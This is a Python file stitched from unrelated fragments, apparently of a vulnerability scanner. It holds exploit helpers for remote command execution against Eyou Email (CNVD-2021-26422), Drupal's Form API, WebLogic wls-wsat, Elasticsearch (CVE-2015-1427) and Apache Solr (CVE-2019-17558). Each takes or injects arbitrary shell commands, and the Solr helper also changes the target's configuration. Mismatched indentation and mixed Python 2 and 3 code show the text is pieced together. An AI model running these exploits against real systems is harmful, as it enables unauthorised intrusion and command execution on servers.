                 self.vul_info["prt_resu"] = "PoC_MaYbE"
                 self.vul_info["vul_payd"] = path
                 self.vul_info["prt_info"] = "[upload:" + path + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
 def cnvd_2021_26422_exp(self, cmd: str) -> None:
     """Exploit helper for CNVD-2021-26422 (Eyou Email System) -- prints the raw response.

     ``cmd`` is spliced unescaped into a ``type=`` form field and POSTed to
     ``/webadm/?q=moni_detail.do&action=gragh`` with ``self.headers``.  The
     whole response body is handed to ``verify.exploit_print`` as the result;
     nothing is parsed or checked.  ``self.raw_data`` is overwritten.
     """
     vul_name = "Eyou Email System: CNVD-2021-26422"
     url = urljoin(self.url, "/webadm/?q=moni_detail.do&action=gragh")
     payload = "type='|" + cmd + "||'"
     try:
         request = requests.post(url, data=payload, headers=self.headers, timeout=self.timeout, verify=False)
         self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         verify.exploit_print(request.text, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
def check_vulnerable_8(base_url):
    """Drupal Form API check (Python 2 code): return True if a random marker is echoed back.

    The marker is base64-encoded client-side and decoded on the target via
    ``echo ... | base64 -d`` through a ``#post_render`` callback of ``exec``
    on the ``/user/register`` timezone element.  Only the response body is
    inspected; the status code is ignored.  ``get_random_string`` is a helper
    defined elsewhere in this file.
    """
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}

    r = get_random_string()
    cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r)))
    url = base_url + '/user/register?element_parents=timezone/timezone/%23value&ajax_form=1'
    data = 'form_id=user_register_form&_drupal_ajax=1&timezone[#post_render][]=exec&timezone[#markup]={0}'.format(cmd)

    # No timeout is set; an unresponsive host blocks here.
    resp = requests.post(url, data, headers=headers, verify=False)

    if r in str(resp.content):
        return True

    return False
    def post(self, data):
        """POST ``data`` to ``/wls-wsat/CoordinatorPortType`` and record a verdict in ``self.result``.

        Returns nothing.  A request failure is logged but does not stop the
        flow: ``self.confirm_sucess()`` (spelling as defined elsewhere) is
        called regardless, so a verdict may still be set after a failed
        request.  The response object ``req`` is never used.
        """
        headers = {
            "Content-Type": "text/xml;charset=UTF-8",
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wls-wsat/CoordinatorPortType"

        vulnurl = self.url + payload
        try:
            req = requests.post(vulnurl, data=data, headers=headers, timeout=10, verify=False)
        except Exception:
            log.error("[-] Connection Error") 
        # Runs even after the except branch above.
        if self.confirm_sucess():
                self.result = "[!] %s is vuln" % vulnurl
 def cve_2015_1427_exp(self, cmd: str) -> None:
     """Exploit helper for CVE-2015-1427 (Elasticsearch) -- prints command output.

     Two requests: an index write to ``/website/blog/`` (so a later search
     has a document to run against), then ``/_search?pretty`` with the stored
     ``payload_cve_2015_1427`` template carrying ``cmd``.  The output is read
     from ``hits.hits[0].fields.lupin[0]`` of the search response.  Several
     ``self.*`` attributes are overwritten as side effects.
     """
     vul_name = "Elasticsearch: CVE-2015-1427"
     self.data_send_info = r'''{ "name": "cve-2015-1427" }'''
     self.data_rce = self.payload_cve_2015_1427.replace("RECOMMAND", cmd)
     self.host = self.hostname + ":" + str(self.port)
     # Only the search request uses these headers (explicit Host and
     # Content-Type application/text); the index write uses self.headers.
     self.headers_text = {
         'Host': "" + self.host,
         'Accept': '*/*',
         'Connection': 'close',
         'Accept-Language': 'en',
         'User-Agent': self.ua,
         'Content-Type': 'application/text'
     }
     try:
         self.request = requests.post(self.url + "/website/blog/",
                                      data=self.data_send_info,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
         self.req = requests.post(self.url + "/_search?pretty",
                                  data=self.data_rce,
                                  headers=self.headers_text,
                                  timeout=self.timeout,
                                  verify=False)
         try:
             self.r = list(json.loads(
                 self.req.text)["hits"]["hits"])[0]["fields"]["lupin"][0]
         except IndexError:
             # Only an empty hits list is handled here; a missing key or a
             # non-JSON body raises KeyError/ValueError, which falls through
             # to the generic handler below and skips the dump.
             self.r = "null"
         raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
         verify.exploit_print(self.r, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception as e:
         verify.error_print(vul_name)
 def cve_2019_17558_exp(self, cmd: str) -> None:
     """Exploit helper for CVE-2019-17558 (Apache Solr VelocityResponseWriter) -- prints the response.

     Three steps: discover the first core name from ``/solr/admin/cores``,
     POST a config update to that core enabling ``solr.VelocityResponseWriter``
     with both resource loaders turned on, then GET the stored
     ``payload_cve_2019_17558`` template (with ``cmd`` substituted) against the
     core.  The config update is a configuration change on the target and its
     response is not checked.
     """
     vul_name = "Apache Solr: CVE-2019-17558"
     core_name = None
     payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
     url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(url_core,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         try:
             # First key of "status" is taken as the core name.
             core_name = list(json.loads(request.text)["status"])[0]
         except AttributeError:
             # Only AttributeError is swallowed; KeyError/IndexError/ValueError
             # from a non-JSON or empty reply go to the generic handler
             # below.  If this branch fires, core_name stays None and the
             # URLs below become "/solr/None/...".
             pass
         url_api = self.url + "/solr/" + str(core_name) + "/config"
         headers_json = {
             'Content-Type': 'application/json',
             'User-Agent': self.ua
         }
         # Config API body: enables the Velocity writer with both resource
         # loaders on.  A POST to /solr/<core>/config carrying this is a
         # clear log signature for this exploit.
         set_api_data = """
         {
           "update-queryresponsewriter": {
             "startup": "lazy",
             "name": "velocity",
             "class": "solr.VelocityResponseWriter",
             "template.base.dir": "",
             "solr.resource.loader.enabled": "true",
             "params.resource.loader.enabled": "true"
           }
         }
         """
         # Response of the config update is discarded (overwritten below).
         request = requests.post(url_api,
                                 data=set_api_data,
                                 headers=headers_json,
                                 timeout=self.timeout,
                                 verify=False)
         # payload_2 is appended directly after the core name; presumably the
         # template starts with a path separator -- confirm.
         request = requests.get(self.url + "/solr/" + str(core_name) +
                                payload_2,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         verify.exploit_print(request.text, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)